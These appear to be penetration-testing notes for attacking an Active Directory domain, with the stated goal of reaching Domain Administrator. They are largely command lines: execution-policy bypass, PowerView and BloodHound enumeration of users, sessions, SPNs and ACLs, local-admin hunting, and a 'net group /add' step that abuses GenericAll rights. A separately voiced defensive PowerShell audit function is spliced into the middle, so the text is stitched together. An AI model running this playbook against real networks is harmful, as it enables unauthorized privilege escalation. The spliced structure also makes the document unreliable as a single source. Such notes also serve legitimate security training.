Enumeration
NOTE: The goal is to escalate privileges to Domain Administrator.
Initial Access
RDP
xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/shared
Enumeration
Manual
NOTE: Make sure to run the following first!
powershell -ep bypass
Get users on the domain
net user /domain
Get info on a particular user
net user <Username> /domain
Get groups on the domain
net group /domain
Get info on a particular CUSTOM group
net group "<Group Name>" /domain
PowerView
NOTE: Remember to run the following first
powershell -ep bypass
Import-Module .\PowerView.ps1
Enumerate Users in the Domain
Get-NetUser
To get a filtered result
Get-NetUser | select <Field Name> ...
EXAMPLE:
Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon
To get specific information about a particular user
Get-NetUser <Username>
Enumerate Groups in the Domain
Get-NetGroup
To get a filtered result
Get-NetGroup | select <Field name> ...
EXAMPLE:
Get-NetGroup | select cn
To get specific information about a particular group
Get-NetGroup <Group Name>
Enumerate Computers in the Domain
Get-NetComputer
To get a filtered result
Get-NetComputer | select <Field name> ...
EXAMPLE:
Get-NetComputer | select operatingsystem, dnshostname
To get specific information about a particular computer
Get-NetComputer <DNS Host Name>
To look for local administrative rights held by the current user on other computers
Find-LocalAdminAccess
To look for logged-on users on a target machine
Get-NetSession -ComputerName <Computer Name> -Verbose
NOTE: If the result looks wrong, check the permissions.
Permissions for NetSessionEnum are defined by the SrvsvcSessionInfo value in the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity
Alternatives
C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>
NOTE: The remote machine must have the Remote Registry service enabled
To check the permissions
Get-Acl -Path <Registry Hive>:<Registry Path> | fl
EXAMPLE:
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
To enumerate Service Principal Names
Get-NetUser -SPN | select samaccountname, serviceprincipalname
To enumerate ACEs
Get-ObjectAcl -Identity "<Username | Group Name>"
NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier
To enumerate interesting ACLs
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -notmatch "DnsAdmins"} | ft
To enumerate all ACEs granting GenericAll on a group
Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights
To enumerate all ACEs granting GenericWrite on a group
Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights
To convert SIDs to names in bulk
"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName
To convert a SID to a name individually
Convert-SidToName "<SID>"
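As an added audit-side example (not part of these notes and not PowerView code), the function below takes ACE records shaped like Get-ObjectAcl output together with a SID-to-name map of the kind Convert-SidToName produces, and reports every GenericAll/GenericWrite holder on a group that is not on an expected-admin list. It matches rights flag by flag because ActiveDirectoryRights is a flags enum and a combined grant renders as "GenericWrite, WriteDacl", which an exact -eq "GenericWrite" test would miss. The group DNs, SIDs and account names in the sample are constructed.

```powershell
# Added audit helper; input objects mimic Get-ObjectAcl fields (ObjectDN,
# ActiveDirectoryRights, SecurityIdentifier). $SidToName is a hashtable
# such as one built from Convert-SidToName output. Unresolved SIDs are
# still reported, since an orphaned SID holding GenericAll is itself a finding.
function Find-RiskyGroupAce {
    param(
        [Parameter(Mandatory)] [object[]]  $Aces,
        [Parameter(Mandatory)] [hashtable] $SidToName,
        [string[]] $ExpectedPrincipals = @('BUILTIN\Administrators', 'CORP\Domain Admins'),
        [string[]] $RiskyRights = @('GenericAll', 'GenericWrite')
    )
    foreach ($ace in $Aces) {
        # Flags enum renders as "Flag1, Flag2"; split and test each flag.
        $rights = [string]$ace.ActiveDirectoryRights -split ',\s*'
        $hit = @($rights | Where-Object { $RiskyRights -contains $_ })
        if ($hit.Count -eq 0) { continue }
        $who = $SidToName[$ace.SecurityIdentifier]
        if (-not $who) { $who = $ace.SecurityIdentifier }
        if ($ExpectedPrincipals -contains $who) { continue }
        [pscustomobject]@{
            Group     = $ace.ObjectDN
            Principal = $who
            Rights    = ($hit -join ', ')
        }
    }
}

# Constructed sample data (hypothetical domain, SIDs and accounts).
$sampleAces = @(
    [pscustomobject]@{ ObjectDN = 'CN=Helpdesk,DC=corp,DC=com';  ActiveDirectoryRights = 'GenericAll';             SecurityIdentifier = 'S-1-5-21-1111-2222-3333-512'  }
    [pscustomobject]@{ ObjectDN = 'CN=Helpdesk,DC=corp,DC=com';  ActiveDirectoryRights = 'GenericAll';             SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1105' }
    [pscustomobject]@{ ObjectDN = 'CN=Finance,DC=corp,DC=com';   ActiveDirectoryRights = 'GenericWrite, WriteDacl'; SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1106' }
    [pscustomobject]@{ ObjectDN = 'CN=Finance,DC=corp,DC=com';   ActiveDirectoryRights = 'ReadProperty';           SecurityIdentifier = 'S-1-5-21-1111-2222-3333-1107' }
)
$sidMap = @{
    'S-1-5-21-1111-2222-3333-512'  = 'CORP\Domain Admins'   # expected, suppressed
    'S-1-5-21-1111-2222-3333-1105' = 'CORP\alice'           # regular user with GenericAll
    'S-1-5-21-1111-2222-3333-1106' = 'CORP\bob'             # GenericWrite inside a combined grant
}

Find-RiskyGroupAce -Aces $sampleAces -SidToName $sidMap | Format-Table -AutoSize
```

Against real data, pipe `Get-ObjectAcl -Identity "<Group Name>"` results into -Aces and build the map from Convert-SidToName; the two expected rows here are CORP\alice (GenericAll on Helpdesk) and CORP\bob (GenericWrite on Finance).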
net group "<Group Name>" <Username> /add /domain
To enumerate all shares on the domain
Find-DomainShare
To enumerate shares accessible to the current user
Find-DomainShare -CheckShareAccess
To enumerate Group Policy
Get-GPO -Name "<Group Policy Name>"
EXAMPLE:
Get-GPO -Name "Default Domain Policy"
To enumerate permissions on the group policy
Get-GPPermission -Guid <GPO GUID> -TargetType User -TargetName <Username>
NOTE: Relevant only if the returned permission contains "ModifySecurity" or "FullControl"
BloodHound
To import BloodHound
Import-Module C:\Tools\Bloodhound.ps1
To begin enumerating with BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"
On kali:
sudo neo4j start
NOTE: Head over to http://localhost:7474
Username: neo4j
Password: arctic-iris-zipper-prism-courage-7161